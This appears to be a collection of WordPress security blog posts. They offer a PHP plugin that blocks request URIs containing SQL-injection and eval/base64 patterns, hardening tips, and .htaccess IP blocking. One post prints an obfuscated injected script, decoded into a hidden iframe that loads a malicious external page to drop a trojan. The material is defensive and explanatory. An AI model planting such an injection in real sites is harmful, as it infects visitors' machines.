If you missed my previous security articles, you may view: 5 Extreme Steps to Secure Your WordPress Blog and 10 Simple Steps to Secure & Protect your WordPress Blog.

Since last year, thousands of sites have been hit by SQL attacks where malicious code is injected into the site. This type of attack completely disables the site’s permalink structure thus making blog post URLs inactive.

The Awesome Solution

We all know that prevention is better than cure, so below you will find the code that will be used to secure your site and prevent the injection. If you are tech savvy, you can create a new .php file, copy and save the code below and give it the file name: block_injections.php.

The code:

<?php
/*
Plugin Name: Block Bad Queries
Plugin URI: http://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/
Description: Protect WordPress Against Malicious URL Requests
Author URI: http://perishablepress.com/
Author: Perishable Press
Version: 1.0
*/
global $user_ID; if($user_ID) {
if(!current_user_can('level_10')) {
if (strlen($_SERVER['REQUEST_URI']) > 255 ||
strpos($_SERVER['REQUEST_URI'], "eval(") ||
strpos($_SERVER['REQUEST_URI'], "CONCAT") ||
strpos($_SERVER['REQUEST_URI'], "UNION SELECT") ||
strpos($_SERVER['REQUEST_URI'], "base64")) {
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;
}
}
} ?>

Source: Perishable Press

If you would prefer not to dabble in any code, you may download the plugin here: Block Bad Queries Plugin

Save the file above and upload it to your plugin directory, /wp-content/plugins/, or use the Add New feature in your plugin section in the WordPress dashboard. This plugin will check for excessively long request strings (greater than 255 characters) as well as the presence of base64 code in the request URI which hides the malicious code.

Once the plugin is activated, it will silently and effectively close any connections for this type of injection attack.

Start Protecting Your Blog

This type of injection attack is extremely common in unprotected WordPress installations and the malicious code is often found hidden within free WordPress themes that are downloaded from questionable websites.

Always remember that prevention is better than cure and your site is your valuable investment.

Discussion

Please share your experiences with securing your blog and the problems that you have overcome. Also, if you require further assistance with implementing the code, please don’t hesitate to ask.

Here are 5 additional tips and practices to ensure that your investment of time, energy and money in your blog never goes to waste.

1. WordPress File Monitor Plugin

This plugin monitors your WordPress installation and sends an e-mail alert to a specified address whenever a file is changed, added or deleted. Usually when a site or blog is hacked or compromised in some way, there is always a file that is altered in your directories. Under normal circumstances we would not know about such low-key changes taking places, so the plugin keeps a constant look-out and reports any changes.

The plugin also shows alerts in the WordPress dashboard, just in case you missed the e-mail alert.

This plugin can be downloaded here: WordPress File Monitor

2. Move Your Wp-config.php File

This tip actually came from Sachin, a fellow blogger and web developer, who commented on my previous security post.

You can further secure your WordPress blog by moving your wp-config.php file (which is found in your root directory) to a directory level that is higher than your www (root) folder. This move will prevent your blog from being hacked through your wp-config.php file.

3. WordPress Anti-Virus Protection Plugin

Hopefully, most of us have anti-virus software for our personal computers, so why not have it for your wordpress blog? This plugin is an extremely effective solution for detecting and protecting your blog against exploitations and spam injections and offers the ability to conduct daily automatic scanning and manual testing while providing e-mail notifications.

This awesome anti-virus plugin can be downloaded here: WordPress AntiVirus

4. WordPress Firewall Plugin

This one is pretty neat and recommended for more advanced users. This plugin has a vast amount features that complement your web host server by logging, detecting and intercepting suspicious parameters and requests. It is also useful for mitigating dreadful zero-day attacks (See definition for Zero-day Attacks Here) and setting different security protection levels.

The plugin can be downloaded here: WordPress Firewall Plugin

5. Encrypted Login Password Plugin

This plugin is very useful for users who do not have SSL (Secure Sockets Layer, see definition here) enabled or is not available. The plugin increases the security of the login process by using a combination of public and secret key encryption to encrypt the password on the client side when you log in. Your server will then decrypt the encrypted password with a private key and grant you access. Note: Javascript is required to enable password encryption.

The plugin can be downloaded here: Semisecure Login Reimagined

Use the plugins and tips above to seriously secure and lock-up your wordpress blog to the Max! Remember, its your investment, so do what it takes to protect it.

Discussion:

Please share with us other tips or plugins not listed above that you may have found useful. Also, please share any experiences or difficulties you may have had in the past and what you did to overcome.

Fortunately, I have never been hacked, so I will be showing an example from another person’s experience that I came across yesterday. Below is a screenshot of his wordpress dashboard 2 months after the malicious script was installed.

Hacked WordPress Screenshot

As you can see, everything’s all mixed up. When he tried to visit his blog through his web browser, his anti-virus software popped up with warnings that a trojan horse was found on the site and the site may be dangerous. This is when he realized that something had gone wrong; after the damage was already done.

The Malicious Code

He then decided to check his theme’s html files to find the source of the problem and here he found some code that he did not recognize because the malicious code was encrypted. Example below:

<script language=”javascript”>eval(unescape(“%64%6F%63%75%6D%65

The hackers obviously encrypted a part of the line of code hoping to hide the true nature and purpose of the script. When decoded the code reads as follows:

<script language=”javascript”>eval(unescape(“document.write(‘<iframe src=”http://xxxxxxxx.org/in.php” width=1 height=1 frameborder=0></iframe>’);”))</script>

The script was actually trying to call a malicious website to load on his website through a hidden frame. This website would automatically load a trojan horse virus in the his browser.

How Did The Script Get in the Html for his Blog?

The next question is; how did this malicious code get into his blog in the first place? Answer: A virus on his local windows PC stole his FTP login credentials from his FTP client and then used the FTP client to remotely infect the site, considering that he used his FTP to directly access his blog’s directories. Typically, the php files with execution permission within the directories were infected, especially the plugin and theme files are the first targets.

The Solution

Here are some steps to take to remove an infestation:

1) Ensure that you have a robust anti-virus software on your PC that is updated. Run a complete scan of your entire computer system and ensure that all viruses are removed. I would recommend downloading Malwarebytes’ Anti-Malware Software to compliment your anti-virus software. This works very well.

2) In this scenario, it was only the default wordpress php files that were affected, so a fresh copy of the files were uploaded after removing the malicious ones from the hosting server.

3) Change local FTP passwords and ensure that the new ones are very complex. This is very important to do because normally after a malicious attack there is always an open “backdoor” that remains and the hacker can easily exploit this.

4) To be on the safe side, change your hosting account’s password as well as your site’s database password, whether it is Postgre or MySQL.

PHP & HTML Knowledge

It is very important to know basic html and php because this will give you the benefit of recognizing suspicious activity and malicious code and I can’t stress this enough. A site such as Lynda.com provides amazing video tutorials that will definitely help you to grasp the basics and master programming languages if you’re seriously interested. They have helped me a lot.

Prevention is Better Than Cure

You may view a list of plugins and techniques that will help to prevent malicious attacks on one of my previous posts here: 10 Simple Steps to Secure & Protect your WordPress Blog

Some key points that are not in that post are:

1) Do not save your login credentials in your FTP client.

2) Change all passwords on a monthly basis

3) Be carefull when downloading free plugins. It is best to download them from wordpress.org.

4) Keep your anti-virus software updated

Please note that if your blog gets hacked, the symptoms and the causes may be different from what had happened in the scenario described above..

If your wordpress blog gets hacked, don’t panic. Use the following resources to recover your website:

Additional Resources if you Suspect That You May Be Hacked

1) Use Google Webmaster Tools to detect malicious scripts.

2) Post the details of symptoms to the WordPress Community, if you notice any suspicious activities happening in your blog

3) If you decide to clean it up yourself, there is a good list of steps to take, in an article at WordPress.org Codex.

Please note that if your blog or other type of site gets hacked, the symptoms and the causes may be different from what had happened in the scenario I presented.

I hope you found this post helpful and will take the steps to prevent the exploitation of your site / blog.

Discussion: Have you ever been hacked? Leave a comment and tell us of your experiences. If you would like to have a more in-depth discussion on this topic, feel free to contact me through here.

Here are 10 very simple steps, tools and tips to ensure that your blog can withstand malicious attacks and not be overrun with spam.

1. Use the Login Lockdown Plugin

Hackers can easily crack your password and other login credentials by using Brute Force Attacks (Click here for a definition). This plugin adds an extra security feature to WordPress by restricting the rate at which failed logins can be re-attempted from a given IP range. This plugin can be downloaded from Bad Neighborhood

2. Delete Unused Plugins

Always ensure to delete unused plugins as these can provide loop holes that can be easily exploited.

3. Secure the /wp-admin/ Directory using .htaccess

I found this one on google’s Matt Cutts’ blog. Secure your /wp-admin/ directory by using a .htaccess file to allow access from specific IP addresses only. Create a new .htaccess file, which you can place directly in /wp-admin/.htaccess.

This is what the .htaccess file contains:

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName “Access Control”
AuthType Basic
order deny,allow
deny from all
# whitelist home IP address
allow from 111.111.111.111
# whitelist work IP address
allow from 111.111.111.111
allow from 111.111.111.111

Replace the 111.111.111.111 with the IPs you would like to whitelist. This file says that the IP address 111.111.111.111 (and the other IP addresses whitelisted) are allowed to access /wp-admin/, but all other IP addresses are denied access. The ‘#’ lines are just notes and can be changed to suit your need.

4. WordPress Security Scanner Plugin

Install this plugin to help detect any loop holes that may exist in your database and blog files. It provides a report on what needs to be done to prevent attacks. This one is very useful and can be downloaded here: WP-Security-Scan

5. Limited Blog Registration Access

If your blog accepts registration, ensure that a user cannot immediately register and receive an administrative access. To change this, go to your Settings option in the wordpress dashboard, select General. Then change the New User Default Role to Contributor. This can easily be changed as the need arise. User privileges can also be assigned using the Role-Manager plugin.

6. Change Your Login Name

The default wordpress username is admin and hackers will always try to infiltrate using this default. So make it harder for them by changing it.

In your WordPress dashboard, go to Users and set up a new user account. Give this new user administrator role. Log out and log in again with the new user account.

Go to Users again. This time, check the box beside admin and press Delete. When it asks for deletion confirmation, select the “Attribute all posts and links to:” and select your new username from the dropdown bar. This will transfer all the posts to your new user account. Press Confirm Deletion

7. Use a Very Strong Password

Ensure that you use a strong password that is difficult for others to guess. Use a combination of digits, special characters and upper/lower case letters to form your password.

8. Always Upgrade to the Latest WordPress Version

The latest version of WordPress always contains bug fixes for any security vulnerabilities, therefore it is very important to keep your blog updated at all times. The latest version at the time of this post is 2.9.2 and can be downloaded here.

9. Install the Akismet Plugin

Once installed, Akismet checks your comments against the Akismet web service to see if they look like spam or not and prevents them from being published. Spam is stored in a separate folder where you can review all that is caught. This can be downloaded from Akismet.com

10. Backup Your WordPress Database

There is a free plugin that can schedule backups of your database to reduce the risk of loss of data. This can be downloaded here: WP-Database-Backup

Yeah, I know its a pretty tedious ToDo list but invest the time to secure a robust wordpress blog. It will cost 100 times more to recover from a malicious attack. Think about down-time, lost revenue, loss of trust from your readers, hiring a professional to get rid of malicious code, loss of information, loss of integrity and the list goes on forever.

Are you doing what it takes to secure and protect your presence online? If not, now is the time to do so. If you have any additional ideas on how to protect a wordpress blog please leave a comment to let us know.

The .htaccess file

First of all, .htaccess (hypertext access), in several web servers (most commonly Apache), is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. The .htaccess file is placed inside the web directory tree, and is able to override a subset of the server’s global configuration; the extent of this subset is defined by the web server administrator, which is you. Basically, you can allow or deny access to your site, whether robots (crawlers) or human visitors.

To create the .htaccess file, simply open your notepad application on windows and save the file as .htaccess There are no characters before the period. This file should be uploaded to your website’s root directory and will contain the commands below. For example: http://www.yourdomain.com/.htaccess

a) To block the IP address, my basic .htaccess file includes:

order allow,deny
deny from 127.0.0.1 (Replace this IP with the one you want to block)
allow from all

* So type this info into your .htaccess file, save it and then upload it to your root directory.

This will refuse all GET and POST requests made by IP address 127.0.0.1, an error message is shown instead and they user can’t access the site and thus won’t use any precious bandwidth.

After uploading the file I started monitoring my hit statistics a week later and I’m glad to say that the culprit IP is no longer there.

b) More options

To block multiple IP addresses, list them one per line.

order allow,deny
deny from 127.0.0.1
deny from 127.0.0.2
deny from 127.0.0.3
allow from all

You can also block an entire IP block/range. Here we will not specify the last octet in the .htaccess file.

e.g. – deny from 127.0.0

This will refuse access for any user with an address in the 127.0.0.0 to 127.0.0.255 range.

Note: Instead of using numeric addresses, domain names (and subdomain names) can be used to ban users.

e.g. – deny from isp_name.com

It bans users with a remote hostname ending in isp_name.com. This would stop all users connected to the internet via isp_name.com from viewing your site.

Using .htaccess to block an entire range or name is likely to lock out innocent users so use these options with caution.

So, here ends this short tutorial on blocking IP addresses using a .htaccess file, hope you found it useful.

The .htaccess file can be used to complete quite a few other tasks such as creating custom error pages, setting up hot-linking protection, password protecting files and directories and more. I will be posting follow-up tutorials to cover all these topics in the very near future.